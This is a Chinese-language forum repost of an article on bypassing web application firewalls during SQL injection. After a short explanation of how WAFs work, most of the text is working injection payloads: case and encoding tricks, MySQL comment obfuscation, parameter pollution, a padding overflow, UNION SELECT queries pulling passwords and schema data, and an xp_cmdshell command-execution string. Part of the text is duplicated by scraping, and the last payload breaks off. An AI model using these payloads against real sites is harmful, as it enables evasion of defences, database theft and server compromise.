搜索
查看: 2414|回复: 0

SQL注入 | 9种绕过Web应用程序防火墙的方式

[复制链接]

69

主题

116

帖子

285

积分

中级会员

牛逼的金牌会员

Rank: 3Rank: 3

积分
285
QQ
发表于 2018-3-14 10:52:10 | 显示全部楼层 |阅读模式
    Web应用程序防火墙(WAF)的主要作用是过滤,监控和阻止各类进出Web应用程序的HTTP流量。WAF区别于常规防火墙,因为WAF能够过滤特定Web应用程序的内容,而常规防火墙充当的则是服务器之间的安全门。通过检查HTTP流量,它可以防止源自Web应用安全漏洞的攻击,如SQL注入XSS文件包含和安全配置错误。

WAF是如何工作的?

  • 协议异常检测:拒绝不符合HTTP标准的请求
  • 增强的输入验证:代理和服务器端验证,而不仅仅是客户端验证
  • 白名单和黑名单
  • 基于规则和基于异常的保护:基于规则的更依赖黑名单机制,基于异常则更灵活
  • 状态管理:关注会话保护还有:Cookie保护,反入侵规避技术,响应监控和信息披露保护。

如何绕过WAF?

1. 当我们在目标URL进行SQL注入测试时,可以通过修改注入语句中字母的大小写来触发WAF保护情况。如果WAF使用区分大小写的黑名单,则更改大小写可能会帮我们成功绕过WAF的过滤。

http://target.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4

2. 关键字替换(在关键字中间可插入将会被WAF过滤的字符) – 例如SELECT可插入变成SEL

http://target.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4

3. 编码

+ URL encode

  1. page.php?id=1%252f%252a*/UNION%252f%252a /SELECT
  2. +Hex encode
  3. target.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4…  
  4.  SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2f61))
  5. +Unicode encode
  6. ?id=10%D6‘%20AND%2201=2%23   
  7.  SELECT 'Ä'='A'; #1
  8. 4. 使用注释
  9. 在攻击字符串中插入注释。例如,/*!SELECT*/ 这样WAF可能就会忽略该字符串,但它仍会被传递给目标应用程序并交由mysql数据库处理。
  10. index.php?page_id=-15 %55nION/**/%53ElecT 1,2,3,4    
  11.  'union%a0select pass from users#  
  12. index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3   
  13.  ?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,
复制代码

5. 某些函数或命令,因为WAF的过滤机制导致我们无法使用。那么,我们也可以尝试用一些等价函数来替代它们。

  1. hex()、bin() ==> ascii()   
  2. sleep() ==>benchmark()   
  3. concat_ws()==>group_concat()
  4. substr((select 'password'),1,1) = 0x70   
  5.  strcmp(left('password',1), 0x69) = 1   
  6.    strcmp(left('password',1), 0x70) = 0   
  7.  strcmp(left('password',1), 0x71) = -1
  8. mid()、substr() ==> substring()  
  9. @@user ==> user()  
  10. @@datadir ==> datadir()
复制代码
SQL注入 | 9种绕过Web应用程序防火墙的方式

WAF区别于常规防火墙,因为WAF能够过滤特定Web应用程序的内容,而常规防火墙充当的则是服务器之间的安全门。通过检查HTTP流量,它可以防止源自Web应用安全漏洞的攻击,如SQL注入,XSS,文件包含和安全配置错误。

作者:secist来源:FreeBuf|2018-03-10 07:39[url=]收藏[/url]
[url=]分享[/url]

沙龙活动 | 3月31日 京东、微博实战专家与你共同探讨容器技术实践!

Web应用程序防火墙(WAF)的主要作用是过滤,监控和阻止各类进出Web应用程序的HTTP流量。WAF区别于常规防火墙,因为WAF能够过滤特定Web应用程序的内容,而常规防火墙充当的则是服务器之间的安全门。通过检查HTTP流量,它可以防止源自Web应用安全漏洞的攻击,如SQL注入XSS文件包含和安全配置错误。

WAF是如何工作的?

  • 协议异常检测:拒绝不符合HTTP标准的请求
  • 增强的输入验证:代理和服务器端验证,而不仅仅是客户端验证
  • 白名单和黑名单
  • 基于规则和基于异常的保护:基于规则的更依赖黑名单机制,基于异常则更灵活
  • 状态管理:关注会话保护还有:Cookie保护,反入侵规避技术,响应监控和信息披露保护。

如何绕过WAF?

1. 当我们在目标URL进行SQL注入测试时,可以通过修改注入语句中字母的大小写来触发WAF保护情况。如果WAF使用区分大小写的黑名单,则更改大小写可能会帮我们成功绕过WAF的过滤。

http://target.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4

2. 关键字替换(在关键字中间可插入将会被WAF过滤的字符) – 例如SELECT可插入变成SEL

http://target.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4

3. 编码

+ URL encode

  1. page.php?id=1%252f%252a*/UNION%252f%252a /SELECT

    +Hex encode

    1. target.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4…
    2.  SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2f61))

      +Unicode encode

      1. ?id=10%D6‘%20AND%2201=2%23   
      2.  SELECT 'Ä'='A'; #1

        4. 使用注释

        在攻击字符串中插入注释。例如,/*!SELECT*/ 这样WAF可能就会忽略该字符串,但它仍会被传递给目标应用程序并交由mysql数据库处理。

        1. index.php?page_id=-15 %55nION/**/%53ElecT 1,2,3,4    
        2.  'union%a0select pass from users#
        3. index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3   
        4.  ?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4…

          5. 某些函数或命令,因为WAF的过滤机制导致我们无法使用。那么,我们也可以尝试用一些等价函数来替代它们。

          1. hex()、bin() ==> ascii()   
          2. sleep() ==>benchmark()   
          3. concat_ws()==>group_concat()
          4. substr((select 'password'),1,1) = 0x70   
          5.  strcmp(left('password',1), 0x69) = 1   
          6.    strcmp(left('password',1), 0x70) = 0   
          7.  strcmp(left('password',1), 0x71) = -1
          8. mid()、substr() ==> substring()  
          9. @@user ==> user()  
          10. @@datadir ==> datadir()

            6. 使用特殊符号

            这里我把非字母数字的字符都规在了特殊符号一类,特殊符号有特殊的含义和用法。

            1. + ` symbol: select `version()`;
            2. + +- :select+id-1+1.from users;
            3. + @:select@^1.from users;
            4. +Mysql function() as xxx
            5. +`、~、!、@、%、()、[]、.、-、+ 、|、%00
            复制代码

            示例

            1. ‘se’+’lec’+’t’   
            2. %S%E%L%E%C%T 1   
            3. 1.aspx?id=1;EXEC(‘ma’+'ster..x’+'p_cm’+'dsh’+'ell ”net user”’)  
            4. ' or --+2=- -!!!'2   
            5.   id=1+(UnI)(oN)+(SeL)(EcT)
            复制代码

            7. HTTP参数控制

            通过提供多个参数=相同名称的值集来混淆WAF。例如[url]http://example.com?id=1&?id=’[/url] or ‘1’=’1′ — ‘在某些情况下(例如使用Apache/PHP),应用程序将仅解析最后(第二个) id= 而WAF只解析第一个。在应用程序看来这似乎是一个合法的请求,因此应用程序会接收并处理这些恶意输入。如今,大多数的WAF都不会受到HTTP参数污染(HPP)的影响,但仍然值得一试。

            + HPP(HTTP Parameter Polution))

            1. /?id=1;select+1,2,3+from+users+where+id=1—   
            2.  /?id=1;select+1&id=2,3+from+users+where+id=1—   
            3.  /?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users

              HPP又称做重复参数污染,最简单的就是?uid=1&uid=2&uid=3,对于这种情况,不同的Web服务器处理方式如下:

              +HPF (HTTP Parameter Fragment)

              这种方法是HTTP分割注入,同CRLF有相似之处(使用控制字符%0a、%0d等执行换行)

              1. /?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--   
              2. select * from table where a=1 union/* and b=*/select 1,pass/* limit */from users—

                +HPC (HTTP Parameter Contamination)

                RFC2396定义了以下字符:

                1. Unreserved: a-z, A-Z, 0-9 and _ . ! ~ * ' ()
                2. Reserved : ; / ? : @ & = + $ ,
                3. Unwise : { } | \ ^ [ ] `

                  不同的Web服务器处理处理构造得特殊请求时有不同的逻辑:

                  8. 缓冲区溢出

                  WAF和其他所有的应用程序一样也存在着各种缺陷和漏洞。如果出现缓冲区溢出的情况,那么WAF可能就会崩溃,即使不能代码执行那也会使WAF无法正常运行。这样,WAF的安全防护自然也就被瓦解了。

                  1. ?id=1 and (select 1)=(Select 0xA*1000)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26

                    9. 整合绕过

                    当使用单一的方式无法绕过时,我们则可以灵活的将多种方式结合在一起尝试。

                    1. target.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4…   
                    2. id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()– -   
                    3. ?id=-725+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(COLUMN_NAME),3,4,5+FROM+/*!IN


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表